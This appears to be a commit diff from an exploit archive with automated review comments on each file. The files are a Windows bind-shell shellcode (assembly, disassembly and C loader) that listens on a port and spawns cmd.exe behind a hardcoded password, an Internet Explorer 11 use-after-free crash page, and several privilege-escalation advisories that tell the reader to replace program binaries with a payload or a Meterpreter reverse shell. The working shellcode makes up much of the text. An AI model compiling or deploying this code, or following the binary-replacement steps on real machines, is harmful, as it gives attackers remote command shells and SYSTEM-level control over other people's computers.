118: 89 46 24 mov %eax,0x24(%esi)
11b: 66 ba 88 01 mov $0x188,%dx
11f: 8b 04 13 mov (%ebx,%edx,1),%eax
122: 01 f8 add %edi,%eax
124: 89 46 28 mov %eax,0x28(%esi)
127: 8b 43 48 mov 0x48(%ebx),%eax
12a: 01 f8 add %edi,%eax
12c: 89 46 2c mov %eax,0x2c(%esi)
12f: 99 cltd
130: 8d 4e 30 lea 0x30(%esi),%ecx
133: c6 01 02 movb $0x2,(%ecx)
136: 66 c7 41 02 11 5c movw $0x5c11,0x2(%ecx)
13c: 89 51 04 mov %edx,0x4(%ecx)
13f: 89 51 08 mov %edx,0x8(%ecx)
142: 89 51 0c mov %edx,0xc(%ecx)
145: 8d 4e 40 lea 0x40(%esi),%ecx
148: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
14e: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
155: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
15c: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
163: 99 cltd
164: 66 ba 90 01 mov $0x190,%dx
168: 29 d4 sub %edx,%esp
16a: 8d 0c 24 lea (%esp),%ecx
16d: 83 c2 72 add $0x72,%edx
170: 51 push %ecx
171: 52 push %edx
172: ff 56 0c call *0xc(%esi)
175: 99 cltd
176: 52 push %edx
177: 52 push %edx
178: 52 push %edx
179: b2 06 mov $0x6,%dl
17b: 52 push %edx
17c: 99 cltd
17d: 42 inc %edx
17e: 52 push %edx
17f: 42 inc %edx
180: 52 push %edx
181: ff 56 28 call *0x28(%esi)
184: 97 xchg %eax,%edi
185: 99 cltd
186: 42 inc %edx
187: 52 push %edx
188: 8d 0c 24 lea (%esp),%ecx
18b: 42 inc %edx
18c: 52 push %edx
18d: 51 push %ecx
18e: 83 c2 02 add $0x2,%edx
191: 52 push %edx
192: 99 cltd
193: 66 ba ff ff mov $0xffff,%dx
197: 52 push %edx
198: 57 push %edi
199: ff 56 10 call *0x10(%esi)
19c: 99 cltd
19d: b2 10 mov $0x10,%dl
19f: 52 push %edx
1a0: 8d 4e 30 lea 0x30(%esi),%ecx
1a3: 52 push %edx
1a4: 51 push %ecx
1a5: 57 push %edi
1a6: ff 56 14 call *0x14(%esi)
1a9: 99 cltd
1aa: 42 inc %edx
1ab: 52 push %edx
1ac: 57 push %edi
1ad: ff 56 1c call *0x1c(%esi)
1b0: 99 cltd
1b1: 8d 5e 30 lea 0x30(%esi),%ebx
1b4: 89 13 mov %edx,(%ebx)
1b6: 89 53 04 mov %edx,0x4(%ebx)
1b9: 89 53 08 mov %edx,0x8(%ebx)
1bc: 89 53 0c mov %edx,0xc(%ebx)
000001bf <a>:
1bf: 99 cltd
1c0: b2 10 mov $0x10,%dl
1c2: 52 push %edx
1c3: 8d 0c 24 lea (%esp),%ecx
1c6: 8d 5e 30 lea 0x30(%esi),%ebx
1c9: 51 push %ecx
1ca: 53 push %ebx
1cb: 57 push %edi
1cc: ff 56 18 call *0x18(%esi)
1cf: 99 cltd
1d0: 50 push %eax
1d1: 52 push %edx
1d2: b2 10 mov $0x10,%dl
1d4: 52 push %edx
1d5: 8d 4e 40 lea 0x40(%esi),%ecx
1d8: 51 push %ecx
1d9: 50 push %eax
1da: ff 56 2c call *0x2c(%esi)
1dd: 58 pop %eax
1de: 89 c3 mov %eax,%ebx
1e0: 99 cltd
1e1: 52 push %edx
1e2: b2 10 mov $0x10,%dl
1e4: 52 push %edx
1e5: 8d 4e 40 lea 0x40(%esi),%ecx
1e8: 51 push %ecx
1e9: 50 push %eax
1ea: ff 56 24 call *0x24(%esi)
1ed: 8d 4e 40 lea 0x40(%esi),%ecx
1f0: 81 39 64 61 6d 6e cmpl $0x6e6d6164,(%ecx)
1f6: 75 5e jne 256 <kick_out>
1f8: 81 79 04 5f 69 74 21 cmpl $0x2174695f,0x4(%ecx)
1ff: 75 55 jne 256 <kick_out>
201: 81 79 08 24 24 23 23 cmpl $0x23232424,0x8(%ecx)
208: 75 4c jne 256 <kick_out>
20a: 81 79 0c 40 3b 2a 23 cmpl $0x232a3b40,0xc(%ecx)
211: 75 43 jne 256 <kick_out>
213: 89 df mov %ebx,%edi
215: 83 ec 10 sub $0x10,%esp
218: 8d 1c 24 lea (%esp),%ebx
21b: 99 cltd
21c: 57 push %edi
21d: 57 push %edi
21e: 57 push %edi
21f: 52 push %edx
220: 52 push %edx
221: b2 ff mov $0xff,%dl
223: 42 inc %edx
224: 52 push %edx
225: 99 cltd
226: 52 push %edx
227: 52 push %edx
228: 52 push %edx
229: 52 push %edx
22a: 52 push %edx
22b: 52 push %edx
22c: 52 push %edx
22d: 52 push %edx
22e: 52 push %edx
22f: 52 push %edx
230: b2 44 mov $0x44,%dl
232: 52 push %edx
233: 8d 0c 24 lea (%esp),%ecx
236: 99 cltd
237: 68 63 6d 64 41 push $0x41646d63
23c: 88 54 24 03 mov %dl,0x3(%esp)
240: 8d 04 24 lea (%esp),%eax
243: 53 push %ebx
244: 51 push %ecx
245: 52 push %edx
246: 52 push %edx
247: 52 push %edx
248: 42 inc %edx
249: 52 push %edx
24a: 99 cltd
24b: 52 push %edx
24c: 52 push %edx
24d: 50 push %eax
24e: 52 push %edx
24f: ff 56 04 call *0x4(%esi)
252: 50 push %eax
253: ff 56 08 call *0x8(%esi)
00000256 <kick_out>:
256: 53 push %ebx
257: ff 56 20 call *0x20(%esi)
25a: 8d 4e 40 lea 0x40(%esi),%ecx
25d: c7 01 45 6e 74 65 movl $0x65746e45,(%ecx)
263: c7 41 04 72 20 70 61 movl $0x61702072,0x4(%ecx)
26a: c7 41 08 73 73 20 63 movl $0x63207373,0x8(%ecx)
271: c7 41 0c 6f 64 65 3a movl $0x3a65646f,0xc(%ecx)
278: e9 42 ff ff ff jmp 1bf <a>
*/
/*
section .text
global _start
_start:
cdq
mov eax,[fs:edx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address
mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi
mov esi,[ebx+0x20]
add esi,edi
g:
inc edx
lodsd
add eax,edi
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g
mov esi,[ebx+0x1c]
add esi,edi
mov ecx,[esi+edx*4]
add ecx,edi
sub esp,80
lea esi,[esp]
mov [esi],dword ecx ;GetProcAddress() 0
;-----------------------
;address CreateProcessA()
cdq
push 0x41414173
mov [esp+2],byte dl
push 0x7365636f
push 0x72506574
push 0x61657243
lea edx,[esp]
push edx
push edi
call ecx
;----------------------
add esp,16
mov [esi+4],dword eax ;CreateProcessA() 4
;-------------------------------
;address ExitProcess()
cdq
push 0x41737365
mov [esp+3],byte dl
push 0x636f7250
push 0x74697845
lea edx,[esp]
push edx
push edi
call [esi]
;-------------------------------
add esp,12
mov [esi+8],dword eax ;ExitProcess() 8
;----------------------------------
cdq
push edx
push 0x41797261
push 0x7262694c
push 0x64616f4c
lea edx,[esp]
push edx
push edi
call [esi]
add esp,12
;------------------------
;loading ws2_32.dll
cdq
push 0x6c6c6c6c
mov [esp+2],byte dl
push 0x642e3233
push 0x5f327377
lea edx,[esp]
push edx
call eax
;---------------------------------
add esp,12
xchg edi,eax
mov ebx,[edi+0x3c]
add ebx,edi
mov ebx,[ebx+0x78]
add ebx,edi
mov ebx,[ebx+0x1c]
add ebx,edi
cdq
mov dx,456
mov eax,[ebx+edx]
add eax,edi
mov [esi+12],dword eax ;WSAStartup() 12
mov eax,[ebx+80]
add eax,edi
mov [esi+16],dword eax ;setsockopt() 16
mov eax,[ebx+4]
add eax,edi
mov [esi+20],dword eax ;bind() 20
mov eax,[ebx]
add eax,edi
mov [esi+24],dword eax ;accept() 24
mov eax,[ebx+48]
add eax,edi
mov [esi+28],dword eax ;listen() 28
mov eax,[ebx+8]
add eax,edi
mov [esi+32],dword eax ;closesocket() 32
mov eax,[ebx+60]
add eax,edi
mov [esi+36],dword eax ;recv() 36
mov dx,392
mov eax,[ebx+edx]
add eax,edi
mov [esi+40],dword eax ;WSASocketA() 40
mov eax,[ebx+72]
add eax,edi
mov [esi+44],dword eax ;send() 44
;---------------------------------
cdq
lea ecx,[esi+48]
mov [ecx],byte 2
mov [ecx+2],word 0x5c11
mov [ecx+4],edx
mov [ecx+8],edx
mov [ecx+12],edx
lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'
;-----------------------------------
;WSAStartup(514,&WSADATA)
cdq
mov dx,400
sub esp,edx
lea ecx,[esp]
add edx,114
push ecx
push edx
call [esi+12]
;--------------------------------
;---------------------------
;;WSASocketA(2,1,6,0,0,0)
cdq
push edx
push edx
push edx
mov dl,6
push edx
cdq
inc edx
push edx
inc edx
push edx
call [esi+40]
xchg edi,eax ;SOCKET
;-------------------------------------
;setsockopt(SOCKET,0xffff,4,&1,2)
cdq
inc edx
push edx
lea ecx,[esp]
inc edx
push edx
push ecx
add edx,2
push edx
cdq
mov dx,0xffff
push edx
push edi
call [esi+16]
;----------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
cdq
mov dl,16
push edx
lea ecx,[esi+48]
push edx
push ecx
push edi
call [esi+20]
;----------------------------
;listen(SOCKET,1)
cdq
inc edx
push edx
push edi
call [esi+28]
cdq
lea ebx,[esi+48]
mov [ebx],edx
mov [ebx+4],edx
mov [ebx+8],edx
mov [ebx+12],edx
a:
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16)
cdq
mov dl,16
push edx
lea ecx,[esp]
lea ebx,[esi+48]
push ecx
push ebx
push edi
call [esi+24]
;---------------------------------
;send(SOCKET,char *a[],16,0)
cdq
push eax
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax
call [esi+44]
;-----------------------
pop eax
;recv(SOCKET,char *a[],16,0)
mov ebx,eax
cdq
push edx
mov dl,16
push edx
lea ecx,[esi+64]
push ecx
push eax
call [esi+36]
;----------------------------------
lea ecx,[esi+64]
cmp dword [ecx],'damn'
jne kick_out
cmp dword [ecx+4],'_it!'
jne kick_out
cmp dword [ecx+8],'$$##'
jne kick_out
cmp dword [ecx+12],'@;*#'
jne kick_out
;password-> damn_it!$$##@;*#
mov edi,ebx
sub esp,16
lea ebx,[esp]
cdq
push edi
push edi
push edi
push edx
push edx
mov dl,255
inc edx
push edx
cdq
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
mov dl,68
push edx
lea ecx,[esp]
cdq
push 'cmdA'
mov [esp+3],byte dl
lea eax,[esp]
;-------------------------------------------------
push ebx
push ecx
push edx
push edx
push edx
inc edx
push edx
cdq
push edx
push edx
push eax
push edx
call [esi+4]
push eax
call [esi+8]
kick_out:
push ebx
call [esi+32]
lea ecx,[esi+64]
mov [ecx],dword 'Ente'
mov [ecx+4],dword 'r pa'
mov [ecx+8],dword 'ss c'
mov [ecx+12],dword 'ode:'
jmp a
*/
#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>
char shellcode[]="\x99\x64\x8b\x42\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x73\x20\x01\xfe\x42\xad\x01\xf8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xfe\x8b\x0c\x96\x01\xf9\x83\xec\x50\x8d\x34\x24\x89\x0e\x99\x68\x73\x41\x41\x41\x88\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x52\x57\xff\xd1\x83\xc4\x10\x89\x46\x04\x99\x68\x65\x73\x73\x41\x88\x54\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x99\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x14\x24\x52\x57\xff\x16\x83\xc4\x0c\x99\x68\x6c\x6c\x6c\x6c\x88\x54\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x14\x24\x52\xff\xd0\x83\xc4\x0c\x97\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x5b\x1c\x01\xfb\x99\x66\xba\xc8\x01\x8b\x04\x13\x01\xf8\x89\x46\x0c\x8b\x43\x50\x01\xf8\x89\x46\x10\x8b\x43\x04\x01\xf8\x89\x46\x14\x8b\x03\x01\xf8\x89\x46\x18\x8b\x43\x30\x01\xf8\x89\x46\x1c\x8b\x43\x08\x01\xf8\x89\x46\x20\x8b\x43\x3c\x01\xf8\x89\x46\x24\x66\xba\x88\x01\x8b\x04\x13\x01\xf8\x89\x46\x28\x8b\x43\x48\x01\xf8\x89\x46\x2c\x99\x8d\x4e\x30\xc6\x01\x02\x66\xc7\x41\x02\x11\x5c\x89\x51\x04\x89\x51\x08\x89\x51\x0c\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\x99\x66\xba\x90\x01\x29\xd4\x8d\x0c\x24\x83\xc2\x72\x51\x52\xff\x56\x0c\x99\x52\x52\x52\xb2\x06\x52\x99\x42\x52\x42\x52\xff\x56\x28\x97\x99\x42\x52\x8d\x0c\x24\x42\x52\x51\x83\xc2\x02\x52\x99\x66\xba\xff\xff\x52\x57\xff\x56\x10\x99\xb2\x10\x52\x8d\x4e\x30\x52\x51\x57\xff\x56\x14\x99\x42\x52\x57\xff\x56\x1c\x99\x8d\x5e\x30\x89\x13\x89\x53\x04\x89\x53\x08\x89\x53\x0c\x99\xb2\x10\x52\x8d\x0c\x24\x8d\x5e\x30\x51\x53\x57\xff\x56\x18\x99\x50\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x2c\x58\x89\xc3\x99\x52\xb2\x10\x52\x8d\x4e\x40\x51\x50\xff\x56\x24\x8d\x4e\x
40\x81\x39\x64\x61\x6d\x6e\x75\x5e\x81\x79\x04\x5f\x69\x74\x21\x75\x55\x81\x79\x08\x24\x24\x23\x23\x75\x4c\x81\x79\x0c\x40\x3b\x2a\x23\x75\x43\x89\xdf\x83\xec\x10\x8d\x1c\x24\x99\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x56\x04\x50\xff\x56\x08\x53\xff\x56\x20\x8d\x4e\x40\xc7\x01\x45\x6e\x74\x65\xc7\x41\x04\x72\x20\x70\x61\xc7\x41\x08\x73\x73\x20\x63\xc7\x41\x0c\x6f\x64\x65\x3a\xe9\x42\xff\xff\xff";
int main(int i,char *a[])
{
int mode;
if(i==1)
mode=1;
else
mode=atoi(a[1]);
switch(mode)
{
case 78:
(* (int(*)())shellcode )();
break;
case 1:
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
default:
break;
}
return 0;
}
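Review bot: in `main()`, the `case 1:` branch that calls `ShellExecute(NULL,NULL,a[0],"78",NULL,0);` has no `break;` and falls through into `default:`; it is harmless only because `default` does nothing but `break;`, so add an explicit `break;` (or a fall-through comment) to make the intent clear. The `mode=atoi(a[1]);` path also accepts any string: a non-numeric argument yields 0 and silently takes the `default` branch, so either document that only `78` and no argument are meaningful or reject other values. The assembly comment block documents the expected password (`;password-> damn_it!$$##@;*#`) but nothing in the C side documents what mode `78` means or that the compiled binary re-launches itself; a one-line comment above `switch(mode)` would cover it.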

platforms/windows/dos/40374.html Executable file
@ -0,0 +1,107 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
# Exploit Title: Internet Explorer 11 Use After Free
# Date: 05/09/2016 - 11/09/2016
# Exploit Author: Marcin Ressel
# Vendor Homepage: https://www.microsoft.com/pl-pl/
# Version: 11.0.9600.18482
# Tested on: Windows 7 (x64)
######################################################################################
0:014> g
(13a8.9b8): Access violation - code c0000005 (!!! second chance !!!)
eax=2f66abb0 ebx=00000001 ecx=2fbc8f08 edx=7ef8d000 esi=2fbc8f08 edi=2fbc8f08
eip=6d754a45 esp=1feac660 ebp=1feac674 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CElement::SecurityContext+0x25:
6d754a45 8b80b8000000 mov eax,dword ptr [eax+0B8h] ds:002b:2f66ac68=????????
0:014> d @eax
2f66abb0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abc0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abd0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abe0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66abf0 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac00 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac10 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
2f66ac20 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:014> kb
ChildEBP RetAddr Args to Child
1feac660 6d5e7c69 6d5e7500 1feac690 2fbc8f08 MSHTML!CElement::SecurityContext+0x25
1feac674 6d5e75cf 2fbc8f08 2fbc8f08 2fbc8f08 MSHTML!CMediaElement::RemoveFromPlayToElementTracker+0x1d
1feac688 6d5e7bee 1feac6a0 6d5e7bd0 00000004 MSHTML!CMediaElement::Shutdown+0xdc
1feac698 6d5e7b1c 48cfae30 50d00bb0 4542dbd0 MSHTML!CMediaElement::OnMarkupTearDown+0x1e
1feac6c4 6d3b23dc 00000000 4542dbd0 50d00bb0 MSHTML!CMarkup::InvokeMarkupTearDownCallbacks+0xc0
1feac6d8 6d3b22c9 00000001 00000001 341a8bb0 MSHTML!CMarkup::TearDownMarkupHelper+0xe4
1feac700 6d3adf1f 00000001 00000001 1feac7d0 MSHTML!CMarkup::TearDownMarkup+0x58
1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
############################################################################################
*/
var doc;
var trg, trg_parent;
function testcase()
{
var e1_frame = document.getElementById("e1");
doc = document;
e = e1_frame.contentWindow.document.createElement("hr");
rf = doc.body.appendChild(e);
e = e1_frame.contentWindow.document.createElement("audio");
rf = doc.body.appendChild(e);
dom = doc.getElementsByTagName("*");
document.getElementById("e1").removeNode(true);
trg = dom[14];
trg_parent = doc.body;
trg.addEventListener('DOMNodeRemoved',
new Function('',
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
),
false);
trg_parent.innerHTML = trg.innerHTML;
//CollectGarbage();
//trg.innerHTML = "<h1></h1>"
setTimeout('location.reload();',700);
}
</script>
<title>Use After Free</title>
</head>
<body onload='testcase();'>
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
</body>
</html>
</html>
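Review bot: the file ends with two `</html>` tags; drop the duplicate on the last line. In the stylesheet, `font-color:red;` is not a CSS property (the property is `color`) and the `};` closing the `body{...}` rule leaves a stray semicolon; neither changes the behaviour of the test case, but both make the markup invalid. In `testcase()`, `e`, `rf` and `dom` are assigned without `var` and become implicit globals; declaring them next to `doc`, `trg` and `trg_parent` keeps the scope explicit, which matters when reading the crash context since `dom[14]` is the element whose removal listener triggers the `CMediaElement::Shutdown` path shown in the `kb` output.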

@ -0,0 +1,59 @@
# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
# Date: 11/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: www.battle.net
# Software Link: https://eu.battle.net/account/download/
# Version: Version 1.5.0.7963
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of
the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just
the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.
2. Proof
C:\Program Files>cacls Battle.net
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Diablo III"
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "StarCraft II"
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls Hearthstone
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files>cacls "Heroes of the Storm"
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
C:\Program Files (x86)>cacls "World of Warcraft"
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
BUILTIN\Administrators:(OI)(CI)F
CREATOR OWNER:(OI)(CI)F
3. Exploit:
Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.
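Review bot: the description states the default install path is `C:\Program Files (x86)\Battle.Net`, but the proof runs `cacls Battle.net` and the game-folder checks from `C:\Program Files>` and only `World of Warcraft` from `C:\Program Files (x86)>`; since the header lists both Windows 10 x64 and Windows XP SP3 x86, state which path belongs to which system so the output can be reproduced. The advisory also has no remediation or vendor-contact section; from the listed ACL (`BUILTIN\Users:(OI)(CI)F`) the corrective action is to remove Full control from `BUILTIN\Users` on the directory tree, leaving `Administrators` and `CREATOR OWNER` as shown, so a short "4. Fix" section would be useful. Typos: "it's subfolders" should read "its subfolders", and "Blizzards game installation folders" should read "Blizzard's".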

@ -0,0 +1,27 @@
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation
# Date: 2016/9/12
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://www.izapya.com/
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
# Version: 1.803 (Latest)
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
# CVE : N/A
======================
# Description :
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Windows Phone, PC, and Mac computers in an instant.
# Its Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
======================
# Proof Of Concept :
# 1- Install Zapya Desktop .
# 2- Generate A Meterpreter Executable Payload .
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.
==================
# Discovered By Arash Khazaei
==================
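Review bot: unlike the other permission advisories in this commit, this one provides no evidence for its central claim: there is no directory ACL listing (`icacls`/`cacls` output) for the Zapya installation directory and no `sc qc` output showing the account `ZapyaService.exe` runs under, so the statement that a replaced binary executes "As NT/SYSTEM User Privilege" cannot be verified from the text. Add both to the "Proof Of Concept" section. Minor: `NT/SYSTEM` is not a Windows account name (`NT AUTHORITY\SYSTEM` is), "Its Easy to use" should read "It's easy to use", and the Title Case used throughout the prose makes the steps harder to read than the plain sentences used in the other advisories.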

@ -0,0 +1,41 @@
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.winsms.co.za
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
# Version: Software Version 3.43, Released September 2015
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program which makes this particularly easy to take leverage.
2. Proof
C:\Program Files>cacls WinSMS
C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace WinSMS.exe or any of the dll's with your preferred payload and wait for execution.
4. Plain Text Password Disclosure:
It is worth noting that sensitive information such as the proxy server password is stored in plain text within the a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb"
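Review bot: section 4 reports a second, distinct issue (the proxy server password stored in plain text in `C:\Program Files (x86)\WinSMS\WinSMS.mdb`) that appears neither in the title nor in the header; either name it in the title or file it separately so it is indexed. The description gives the install path as `C:\Program Files (x86)\WinSMS` while the proof runs `cacls WinSMS` from `C:\Program Files>`; clarify which system produced the listing. Typos: "it's subfolders" should read "its subfolders", "within the a database file" should read "within a database file", and "easy to take leverage" should read "easy to leverage".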

@ -0,0 +1,69 @@
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify
privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the
application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
